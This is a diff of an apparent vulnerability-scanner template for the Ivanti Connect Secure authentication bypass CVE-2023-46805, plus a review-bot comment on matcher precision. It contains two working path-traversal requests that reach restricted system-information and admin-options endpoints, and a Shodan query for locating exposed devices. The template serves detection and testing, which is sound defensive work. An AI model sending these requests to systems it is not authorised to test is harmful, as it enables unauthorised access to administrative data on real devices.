diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml
index 552fabe42b..3efd27fc9c 100644
--- a/http/cves/2023/CVE-2023-46805.yaml
+++ b/http/cves/2023/CVE-2023-46805.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-46805
 info:
 name: Ivanti ICS - Authentication Bypass
- author: DhiyaneshDK
+ author: DhiyaneshDK,daffainfo,geeknik
 severity: high
 description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
 reference:
@@ -15,33 +15,36 @@ info:
 cwe-id: CWE-287
 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
 metadata:
- max-request: 1
 vendor: ivanti
- product: "connect_secure"
- shodan-query: "html:\"welcome.cgi?p=logo\""
+ product: connect_secure
+ shodan-query: html:"welcome.cgi?p=logo"
 tags: cve,cve2023,kev,auth-bypass,ivanti
 http:
- - method: GET
- path:
- - "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information"
+ - raw:
+ - |
+ GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
+ Host: {{Hostname}}
- matchers-condition: and
+ - |
+ GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: or
 matchers:
- - type: word
- part: body
- words:
- - '"build":'
- - '"system-information":'
- - '"software-inventory":'
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 200'
+ - 'contains(body_1, "build")'
+ - 'contains(body_1, "system-information")'
+ - 'contains(body_1, "software-inventory")'
+ - 'contains(all_headers_1, "application/json")'
 condition: and
- - type: word
- part: header
- words:
- - 'application/json'
-
- - type: status
- status:
- - 200
-# digest: 490a0046304402200c2940ac9185c5eb2e95f351128a93769e4ec4fe672f158c99b3b4dc4b84b3a1022029f5e9c610b5d8b080a94548f97227972aee323b91cec07e4d3795f37cdb64ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "poll_interval")'
+ - 'contains(body_2, "block_message")'
+ - 'contains(all_headers_2, "application/json")'
+ condition: and
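Review bot: The new DSL matchers test bare substrings (`contains(body_1, "build")`, `"system-information"`, `"software-inventory"`), whereas the removed word matcher required the JSON key form (`'"build":'` and so on), so the detection is looser than before. Because `system-information` is also part of the requested path, a 200 JSON response that merely echoes the path already satisfies that condition, and `build` is a common substring, which raises the false-positive rate on non-vulnerable hosts. Keeping the key shape, for example `contains(body_1, "\"build\":")` (escaping to be confirmed against the DSL engine), and doing the same for `poll_interval` and `block_message` in the second matcher, would retain the old precision. The hunk also drops `max-request: 1` while the template now sends two requests; unless that field is regenerated by tooling, it should come back as `max-request: 2`.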